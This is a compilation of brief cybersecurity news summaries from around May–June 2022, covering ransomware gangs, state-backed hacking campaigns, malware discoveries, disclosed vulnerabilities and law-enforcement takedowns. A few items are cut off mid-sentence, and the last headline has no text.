    Europol has announced the takedown of the FluBot operation, one of the largest and fastest-growing Android malware operations in existence. The malware operation's takedown resulted from a law enforcement operation involving eleven countries following a complex technical investigation to pinpoint FluBot's most critical infrastructure. The participants in the operation were Australia, Belgium, Finland, Hungary, Ireland, Spain, Sweden, Switzerland, the Netherlands, and the United States.

    Anonymous Claims Attacks Against Belarus for Involvement in Russian Invasion of Ukraine

    Anonymous-affiliated collective Spid3r claims to have attacked Belarus’ government websites in retaliation for the country’s alleged support of Russia’s invasion of Ukraine. The group made the announcement on Twitter, publishing screenshots of various websites connected with the Belarus state being down, including the Ministry of Communications, the Ministry of Justice and the Ministry of Economy.

    Experts Warn of Ransomware Attacks Against Government Organizations of Small States

    Cyber Research Labs observed a rise in ransomware attacks in the second quarter of 2022, some of them with a severe impact on the victims, such as the attack that hit the Costa Rican government that caused a nationwide crisis. The experts warn of ransomware attacks against government organizations. They observed a total of 48 government organizations from 21 countries that were hit by 13 ransomware attacks in 2022.

    Interpol Arrests Alleged Leader of the SilverTerrier BEC Gang

    After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT. Codenamed Delilah, the law enforcement operation engaged police agencies across four continents and is the third one focused on identifying and arresting suspected members of the SilverTerrier gang.

    New ERMAC 2.0 Android Malware Steals Accounts, Wallets From 467 Apps

    The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto-wallets. The goal of the trojan is to send stolen login credentials to threat actors, who then use them to take control of other people’s banking and cryptocurrency accounts and conduct financial or other forms of fraud.

    BlackCat/ALPHV Ransomware Asks $5 Million to Unlock Austrian State

    Austrian federal state Carinthia has been hit by the BlackCat ransomware gang, also known as ALPHV, who demanded $5 million to unlock the encrypted computer systems. ALPHV/BlackCat is a ransomware gang that emerged in November 2021. The group is a rebrand of the DarkSide/BlackMatter gang who was responsible for the Colonial Pipeline attack last year. Since the beginning of 2022, ALPHV/BlackC

    Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely

    Researchers have demonstrated what they call the "first active contactless attack against capacitive touchscreens." GhostTouch, as it's called, "uses electromagnetic interference (EMI) to inject fake touch points into a touchscreen without the need to physically touch it," a group of academics from Zhejiang University and Technical University of Darmstadt said in a new research paper.

    FBI: Compromised US Academic Credentials Available on Various Cybercrime Forums

    The FBI issued an alert to inform the higher education sector about the availability of login credentials on dark web forums that threat actors can use to launch attacks against individuals and organizations in the industry. The availability of this data is the result of continued attacks conducted by threat actors against US colleges and universities. The alert also includes recommendations and mitigations for these attacks. “This exposure of sensitive credential and network access information, especially privileged user accounts, could lead to subsequent cyber-attacks against individual users or affiliated organizations,” reads the alert published by the FBI.

    Experts Released PoC Exploit Code for Critical VMware CVE-2022-22972 Flaw

    “Horizon3 security researchers have released a proof-of-concept (PoC) exploit and technical analysis for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products. The virtualization giant recently warned that a threat actor can exploit the CVE-2022-22972 flaw (CVSSv3 base score of 9.8) to obtain admin privileges and urges customers to install patches immediately” (Security Affairs, 2022). “This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0014. The ramifications of this vulnerability are serious,” states VMware. The vulnerability resides in Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

    Industrial Spy Data Extortion Market Gets into the Ransomware

    The Industrial Spy data extortion marketplace has now launched its own ransomware operation, in which it also encrypts victims' devices. The marketplace allows threat actors, and even business competitors, to purchase stolen data from various companies. This marketplace sells different types of stolen data, ranging from 'premium' data for millions of dollars to individual files for as little as $2.

    Hacker of Python, PHP Libraries: No “Malicious Activity” Was Intended

    The two packages in question were 'ctx' and 'PHPass', which together have been downloaded over 3 million times. The incident sparked much panic and discussion among developers, now worried about the impact of the hijack on the overall software supply chain. It was yesterday that developers noticed the two Python and PHP libraries had been modified to harvest AWS developer credentials, in what was determined to be a bug-bounty exercise, or at least was meant to be ethical in nature. However, as a result of the successful penetration testing, “The hijacked versions didn't stop at basic PoC—they stole the developer's environment variables and AWS credentials, casting doubts on the intention of the hijacker or if this was even ethical research.”

    Researchers Find New Malware Attacks Targeting Russian Government Entities

    An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda.

    BPFDoor Malware Uses Solaris Vulnerability to Get Root Privileges

    New research into the inner workings of the stealthy BPFDoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems. BPFDoor is a custom backdoor that has been used largely undetected for at least five years in attacks against telecommunications, government, education, and logistics organizations. The malware was discovered only recently and reported first by researchers from PricewaterhouseCoopers (PwC), who attributed it to a China-based threat actor they track as Red Menshen. PwC found BPFDoor during an incident response engagement in 2021. Looking closer at the malware, the researchers noticed that it received commands from Virtual Private Servers (VPS) controlled through compromised routers in Taiwan.

    New Zoom Flaws Could Let Attac

    Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

    General Motors Credential Stuffing Attack Exposes Car Owners’ Info

    “US car manufacturer GM disclosed that it was the victim of a credential stuffing attack last month that exposed some customers' information and allowed hackers to redeem rewards points for gift cards. General Motors operates an online platform to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles manage their bills, services, and redeem rewards points. Car owners can redeem GM rewards points towards GM vehicles, car service, accessories, and purchasing OnStar service plans.”

    New Chaos Ransomware Builder Variant "Yashma" Discovered in the Wild

    The Research and Intelligence team at BlackBerry released a report today detailing a new version of the Chaos ransomware line, dubbed Yashma. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. Since its discovery, the ransomware builder has undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022.

    Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code

    Microsoft recently observed web skimming campaigns employing various obfuscation techniques to deliver and hide skimming scripts. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report.

    Researchers to Release Exploit for New VMware Auth Bypass, Patch Now

    Identified as CVE-2022-22972, the security issue received a fix last Wednesday, accompanied by an urgent warning for administrators to install the patch or apply mitigations immediately. In an advisory on May 18th, VMware warned that the security implications for leaving CVE-2022-22972 unpatched are severe as the issue is "in the critical severity range with a maximum CVSSv3 base score of 9.8," with 10 being the maximum.

    Chinese "Twisted Panda" Hackers Caught Spying on Russian Defense Institutes

    At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, which has prompted a wide range of threat actors to swiftly adapt their campaigns to the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war- and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents.

    Russian Hackers Perform Reconnaissance Against Austria, Estonia

    In a new reconnaissance campaign, the Russian state-sponsored hacking group Turla was observed targeting the Austrian Economic Chamber, a NATO platform, and the Baltic Defense College. This discovery comes from cybersecurity firm Sekoia, which built upon previous findings of Google’s TAG, which has been following Russian hackers closely this year. Google warned about coordinated Russian-based threat group activity in late March 2022, while in May, they spotted two Turla domains used in ongoing campaigns. Sekoia used this information to investigate further and found that Turla targeted the federal organization in Austria and the military college in the Baltic region.

    Google: Predator Spyware Infected Android Devices Using Zero-Days

    Google's Threat Analysis Group (TAG) says that state-backed threat actors used five zero-day vulnerabilities to install Predator spyware developed by commercial surveillance developer Cytrox. In these attacks, part of three campaigns that started between August and October 2021, the attackers used zero-day exploits targeting Chrome and the Android OS to install Predator spyware implants on fully up-to-date Android devices.

    Threat Actors Target the InfoSec Community with Fake PoC Exploits

    Researchers from threat intelligence firm Cyble uncovered a malware campaign targeting the infosec community. The experts discovered a post in which a researcher was sharing fake Proof of Concept (PoC) exploit code for an RPC Runtime Library Remote Code Execution flaw (CVE-2022-26809, CVSS 9.8). The malware, disguised as PoC code, was available on GitHub.

    Cisco Urges Admins to Patch IOS XR Zero-day Exploited in Attacks

    Cisco has addressed a zero-day vulnerability in its IOS XR router software that allowed unauthenticated attackers to remotely access Redis instances running in NOSi Docker containers. The IOS XR Network OS is deployed on multiple Cisco router platforms, including NCS 540 & 560, NCS 5500, 8000, and ASR 9000 series routers.

    Conti Ransomware Shuts Down Operation, Rebrands Into Smaller Units

    Advanced Intel researcher Yelisey Boguslavskiy announced on Twitter yesterday that the Conti ransomware gang has officially shut down its operation, stating that the gang’s internal infrastructure was turned off. While the public-facing "Conti News" data leak and ransom negotiation sites are still online, Boguslavskiy told BleepingComputer that the Tor admin panels used by members to perform negotiations and publish "news" on their data leak site are now offline.

    Microsoft Detects Massive Surge in Linux XorDdos Malware Activity

    Microsoft stated in a blog post yesterday that it has seen a 254% increase in activity from a Linux trojan called XorDdos. XorDdos is a modular malware that amasses botnets by targeting a multitude of Linux system architectures (ARM, x86, and x64). First discovered in 2014 by the research group MalwareMustDie, XorDdos was named after its usage of XOR-based encryption for C2 communication and being employed to launch distributed denial-of-service (DDoS) attacks. As the tech giant revealed, the botnet’s success is likely due to its extensive use of various evasion and persistence tactics which allow it to remain stealthy and hard to remove.

    Modern "Smart" Farm Machinery Vulnerable to Cyber-Attackers

    A new risk analysis published today warns that modern “smart” farm machinery is vulnerable to malicious hackers, leaving global supply chains exposed to risk. The analysis, published in the journal Nature Machine Intelligence, warns that hackers could exploit flaws in agricultural hardware used to plant and harvest crops. Additionally, it said automatic crop sprayers, drones and robotic harvesters could be vulnerable to hackers.

    Canada Bans Huawei and ZTE from 5G Networks Over Security Concerns

    The Government of Canada announced its intention to ban the use of Huawei and ZTE telecommunications equipment and services across the country's 5G and 4G networks. The statement explains that after a thorough review from Canada's independent security agencies, the two Chinese tech companies have been deemed too great of a security risk to be allowed in the country's telecommunication network.

    Jupiter WordPress Plugin Flaws Let Hackers Take Over Sites

    WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw. Jupiter is a powerful high-quality theme builder for WordPress sites used by over 90,000 popular blogs, online mags, and platforms that enjoy heavy user traffic. The vulnerability, tracked as CVE-2022-1654, and given a CVSS score of 9.9 (critical), allows any authenticated user on a site using the vulnerable plugins to gain administrative privileges.

    QNAP Alerts NAS Customers of New Deadbolt Ransomware Attacks

    Taiwan-based network-attached storage (NAS) maker QNAP warned customers on Thursday to secure their devices against attacks pushing DeadBolt ransomware payloads. The company asked users to update their NAS devices to the latest software version and ensure that they're not exposed to remote access over the Internet.

    Web Trackers Caught Intercepting Online Forms Even Before Users Hit Submit

    New research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before the form is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission in the European Union, a number that jumped to 2,950 when the same set of websites was visited from the U.S.

    Ransomware Gangs Rely More on Weaponizing Vulnerabilities

    Group-IB released a report this week outlining various tactics ransomware groups are using to breach victim networks. According to their research, external remote access services continue to be the main attack vector used by ransomware gangs to gain initial access. However, they note that there has been an uptick in the use of exploitable vulnerabilities.

    VMware Patches Critical Auth Bypass Flaw in Multiple Products

    VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges. The flaw (tracked as CVE-2022-22972) was reported by Bruno López of Innotec Security, who found that it impacts Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

    [WS] Wizard Spider Group In-Depth Analysis

    On May 16, 2022, the threat intelligence team at PRODAFT (PTI) released a report detailing the inner workings of the Wizard Spider group. Wizard Spider is a financially motivated cybercrime group that is believed to operate out of Russia. The group was first identified in 2017 and is known for the creation and deployment of TrickBot, a modular malware that was officially discontinued earlier this year. Wizard Spider possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals. The group has been tied to various malware variants including Ryuk, Conti, Bazar, Cobalt Strike, etc.

    Researchers Spotted a New Variant of the UpdateAgent macOS Malware Dropper

    Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. The malware dropper has a variety of capabilities including system fingerprinting, endpoint registration, and persistence tools. For second stage payloads, researchers found evidence of different types of malware, spyware and adware.

    Microsoft Warns of Brute-force Attacks Targeting MSSQL Servers

    Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords. While this isn't necessarily the first time MSSQL servers have been targeted in such attacks, Microsoft says that the threat actors behind this recently observed campaign are using the legitimate sqlps.exe tool as a LOLBin (short for living-off-the-land binary).

    The threat actors are using the sqlps[.]exe utility to achieve fileless persistence. The executable is a PowerShell wrapper used for running SQL-built commands. The executable is also used to create a new sysadmin account which allows them to take control of the SQL server. From there they can perform other actions and deploy additional payloads like ransomware or cryptominers.

    A Custom PowerShell RAT Used to Target German Users With the Ukraine Crisis as Bait

    Researchers at Malwarebytes uncovered a campaign that targets German users with a custom PowerShell RAT. The threat actors attempt to trick victims into opening weaponized documents by using the current situation in Ukraine as bait. The attackers registered a decoy site that was an expired German domain name at collaboration-bw[.]de. The site was hosting a bait document, named “2022-Q2-Bedrohungslage-Ukraine,” used to deliver the custom malware. The document appears to contain information about the current crisis in Ukraine.

    Hackers Target Tatsu WordPress Plugin in Millions of Attacks

    Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites. Tatsu Builder is a popular plugin that offers powerful template editing features integrated right into the web browser. Large attack waves started on May 10, 2022 and peaked four days later. Exploitation is currently ongoing.

    US Warning: North Korea's Tech Workers Posing as Freelance Developers

    Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract work as developers in US and European tech and crypto firms. The warning comes in a new joint advisory from The US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions.

    CISA Warns Admins to Patch Actively Exploited VMware, Zyxel Bugs

    CISA has added two more vulnerabilities to its list of actively exploited bugs, a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices. The Spring Framework vulnerability (CVE-2022-22947) is a maximum severity weakness that attackers can abuse to gain remote code execution on unpatched hosts. The vulnerability is being used by a recently discovered botnet called Sysrv, which is installing cryptomining malware on vulnerable Windows and Linux servers.

    Ukraine CERT-UA Warns of New Attacks Launched by Russia-linked Armageddon APT

    Ukraine CERT has released details on a new phishing attack carried out by the Russia-linked Armageddon group. The threat actors are using an HTM file to decode and create an archive named “Henson[.]rar” which contains a malicious LNK file titled “Kherson[.]lnk.” Upon clicking on the link file, the HTA file “precarious[.]xml” is loaded and executed, leading to the creation and execution of the files “desktop[.]txt” and “user[.]txt”. In the last stage of the attack chain, the GammaLoad[.]PS1_v2 malware is downloaded and executed on the victim’s computer.

    Hackers are Exploiting Critical Bug in Zyxel Firewalls and VPNs

    Hackers have started to exploit a recently patched critical vulnerability, tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses. Successful exploitation allows a remote attacker to inject arbitrary commands without authentication, which can enable setting up a reverse shell.

    SonicWall ‘Strongly Urges’ Admins to Patch SSLVPN SMA1000 Bugs

    SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances. SonicWall SMA 1000 SSLVPN solutions are used by enterprises to simplify end-to-end secure remote access to corporate resources across on-prem, cloud, and hybrid data center environments.

    Engineering Firm Parker Discloses Data Breach After Ransomware Attack

    The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month. Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.

    Microsoft: Sysrv Botnet Targets Windows, Linux Servers With New Exploits

    Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers. Redmond discovered a new variant (tracked as Sysrv-K) that has been upgraded with more capabilities, including scanning for unpatched WordPress and Spring deployments.

    New Saitama Backdoor Targeted Official From Jordan's Foreign Ministry

    A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

    A 10-point Plan to Improve the Security of Open Source Software

    The Linux Foundation and the Open Source Software Security Foundation, with input provided by executives from 37 companies and many U.S. government leaders, delivered a 10-point plan to broadly address open source and software supply chain security by securing open source software production, improving vulnerability discovery and remediation, and shortening the patching response time of the ecosystem.

    Personal Details of 21M SuperVPN, GeckoVPN Users Leaked on Telegram

    On May 7th, researchers became aware of an online database containing personal details and login credentials for 21 million users of various VPN providers. The leaked database contains 10 GB of sensitive information from SuperVPN, GeckoVPN, and ChatVPN. The details in the database were actually stolen over a year ago and were put up for sale on Dark Web marketplaces. Now, the information is publicly available on Telegram for free.

    Costa Rica Declares National Emergency Following Conti Cyber-Attack

    Costa Rica has declared a national emergency following sustained cyber-attacks on government systems by the Russia-based Conti ransomware gang. The decree, signed by newly-elected President Rodrigo Chaves, is believed to be the first-ever response of this type by a government to a cyber-attack. Chaves described the attack, which took place on April 18, as an act of “cyber terrorism”.

    HP Fixes Bug Letting Attackers Overwrite Firmware in Over 200 Models

    HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which allow code to run with Kernel privileges. Kernel-level privileges are the highest rights in Windows, allowing threat actors to execute any command at the Kernel level, including manipulating drivers and accessing the BIOS.

    Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks

    A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus).

    Massive Hacking Campaign Compromised Thousands of WordPress Websites

    Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content. According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks. The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

    CISA Alert: Protecting Against Cyber Threats to Managed Service Providers and their Customers

    The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

    Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K.

    A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022.

    New IceApple Exploit Toolset Deployed on Microsoft Exchange Servers

    Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. IceApple is a highly sophisticated .NET-based framework that comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate valuable data. These modules run in memory, emphasizing the adversary’s priority of maintaining a low forensic footprint on the infected host.

    Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia

    An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.

    Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP (Updated: CISA Tells Federal Agencies to Fix Actively Exploited F5 BIG-IP Bug)

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices. F5 customers using BIG-IP solutions include governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company claiming that "48 of Fortune 50 companies are F5 customers."

    Hackers are Using Tech Services Companies as a 'Launchpad' for Attacks on Customers

    International cybersecurity agencies are urging IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks. The cybersecurity agencies warn that Russia's invasion of Ukraine has increased the risk of cyberattacks against organizations around the world. But they also suggest a number of actions that IT and cloud service providers, along with their customers, can take to protect networks from supply chain attacks, in which attackers gain access to a company that provides software or services to many other companies. "As this advisory makes clear, malicious cyber actors continue to target managed service providers, which is why it's critical that MSPs and their customers take recommended actions to protect their networks," said Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA).

    Microsoft Patch Tuesday

    This month, Microsoft released patches for 75 vulnerabilities. Of these 74, 7 are critical (2 elevation of privilege and 5 remote code execution), 66 are important, and 1 is rated as low. There is one zero-day vulnerability (CVE-2022-26925) that has been publicly disclosed and exploited in the wild. Two other vulnerabilities (CVE-2022-22713 and CVE-2022-29972) have been publicly disclosed but not yet observed exploited in the wild.

    New REvil Samples Indicate Ransomware Gang is Back After Months of Inactivity

    The notorious ransomware operation known as REvil (aka Sodin or Sodinokibi) has resumed after six months of inactivity, an analysis of new ransomware samples has revealed. "Analysis of these samples indicates that the developer has access to REvil's source code, reinforcing the likelihood that the threat group has reemerged," researchers from Secureworks Counter Threat Unit (CTU) said in a report published Monday.

    Hacktivists Hacked Russian TV Schedules During Victory Day and Displayed Anti-war Messages

    Since Russia’s invasion of Ukraine, hacktivists and white hat hackers have continued to support Ukraine by launching cyberattacks on Russian websites and infrastructure. In a recent attack, they defaced Russian TV with anti-war messages and took down the RuTube video streaming site. The attack took place during Russia’s Victory Day: Russians attempting to view the parade were shown pro-Ukraine messages due to a cyber attack that impacted the Russian TV listings systems. According to the BBC, the coordinated attack affected major Russian networks, including Channel One, Rossiya-1, MTS, Rostelecom, and NTV-Plus.

    Lincoln College to Close After 157 Years Due to Ransomware Attack

    Lincoln College, a liberal-arts school from rural Illinois, says it will close its doors later this month, 157 years since its founding and following a brutal hit on its finances from the COVID-19 pandemic and a recent ransomware attack. This decision was made even harder with the college having survived multiple disasters, including a major fire in 1912, the Spanish flu, the Great Depression, the World Wars, and the 2008 global financial crisis.

    US Government Offers $15m Reward for Info on Conti Actors

    The US authorities have offered a multimillion-dollar reward for information leading to the identification, arrest and/or conviction of individuals involved in attacks using the Conti ransomware variant. Offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP), the money is split into two pots: up to $10m for information on the identity or location of individuals “who hold a key leadership position” in Conti; and up to $5m for information leading to the arrest or conviction of anyone conspiring to use the malware in attacks.

    Cyber Attack Halts Production at Ag Equipment Maker AGCO Fendt

    A cyber attack has disrupted the operations of AGCO/Fendt, a major manufacturer of agricultural equipment, the company has acknowledged. AGCO/Fendt, headquartered in Duluth, Georgia, said in a statement to the Security Ledger that it was the subject of a cybersecurity incident that “has impacted some of our production facilities. We are working to address the issues. Our first priority is to restore those critical activities needed to keep farmers farming.” The company first acknowledged the attack on Thursday, May 5.

    GitHub Announces Mandatory 2FA for Code Contributors

    Code hosting platform GitHub on Wednesday said it would make it mandatory for software developers to use at least one form of two-factor authentication (2FA) by the end of 2023. The Microsoft-owned platform has been supporting 2FA for years and is allowing users to use physical and virtual security keys, Time-based One-Time Password (TOTP) authenticator apps, and SMS as a second form of authentication.

    Ukraine’s IT Army is Disrupting Russia's Alcohol Distribution

    Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia. DDoS (distributed denial of service) attacks are collective efforts to overwhelm servers with large volumes of garbage traffic and bogus requests, rendering them unable to serve legitimate visitors.

    Security Researchers: Here’s How the Lazarus Hackers Start Their Attacks

    The Lazarus hacking group is one of the top cybersecurity threats from North Korea, recently catching the attention of the US government for massive cryptocurrency heists. Now researchers at NCC Group have pieced together a few of the tools and techniques Lazarus hackers have been using recently, including social engineering on LinkedIn, messaging US defense contractor targets on WhatsApp, and installing the malicious downloader LCPDot.

    Microsoft, Apple and Google Team Up on Passwordless Standard

    Some of the world’s biggest tech companies are throwing considerable weight behind a common passwordless sign-in standard that could finally signal the end of static credentials for many users. Apple, Microsoft and Google announced plans to support the FIDO Alliance and World Wide Web Consortium (W3C) standard, making it easier for websites and apps to deliver end-to-end passwordless authentication via fingerprint/face scan or device PIN.

    New Raspberry Robin Worm Uses Windows Installer to Drop Malware

    Red Canary researchers have discovered a new wormable Windows malware that spreads through USB drives. They have dubbed the malware Raspberry Robin and first observed the activity back in September 2021. Using detection tools on customer networks, Red Canary saw the malware spreading in the technology and manufacturing sectors.

    New NetDooka Malware Spreads via Poisoned Search Results

    A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

    FBI says Business Email Compromise is a $43 Billion Scam

    The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021. From June 2016 until July 2019, IC3 received victim complaints regarding 241,206 domestic and international incidents, with a total exposed dollar loss of $43,312,749,946.

    F5 Warns its Customers of Tens of Flaws in its Products

    F5 and US-CERT released security notifications this morning, warning of a number of vulnerabilities in various products. In total the company addressed 43 vulnerabilities, the most severe being tracked as CVE-2022-1388. It received a CVSS score of 9.8 and allows an unauthenticated attacker to exploit BIG-IP systems through the management port. Using the system, they can execute arbitrary system commands, create or delete files, or disable services.

    State-Backed Chinese Hackers Target Russia

    Financially motivated and state-sponsored actors around the globe continue to use the war in Ukraine as a lure for phishing campaigns, with Chinese groups targeting Russia of late, according to Google. The tech giant’s Threat Analysis Group (TAG) claimed in its new quarterly bulletin that the usual governments of China, Iran, North Korea and Russia were responsible for many of the attacks recorded over the period.

    Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies

    An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

    Conti, Revil, Lockbit Ransomware Bugs Exploited to Block Encryption

    Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the tables by finding exploits in the most common ransomware and malware being distributed today. Malware from notorious ransomware operations like Conti, the revived REvil, the newcomer Black Basta, the highly active LockBit, or AvosLocker all came with security issues that could be exploited to stop the final and most damaging step of the attack, file encryption.

    Pro-Ukraine Hackers Use Docker Images to DDoS Russian Sites

    Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by the government, military, and news organizations. Behind the incidents are believed to be pro-Ukrainian actors such as hacktivists, likely backed by the country's IT Army.

    Aruba and Avaya Network Switches Are Vulnerable to RCE Attacks

    Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HP) and Avaya (owned by Extreme Networks) that could allow malicious actors to execute code remotely on the devices. The damage caused by a successful attack ranges from data breaches and complete device takeover to lateral movement and overriding network segmentation defenses.

    Green - Chinese Cyber-espionage Group Moshen Dragon Targets Asian Telcos

    Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia. While this new threat group has some overlaps with "RedFoxtrot" and "Nomad Panda," including the use of ShadowPad and PlugX malware variants, there are enough differences in their activity to follow them separately.

    SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse

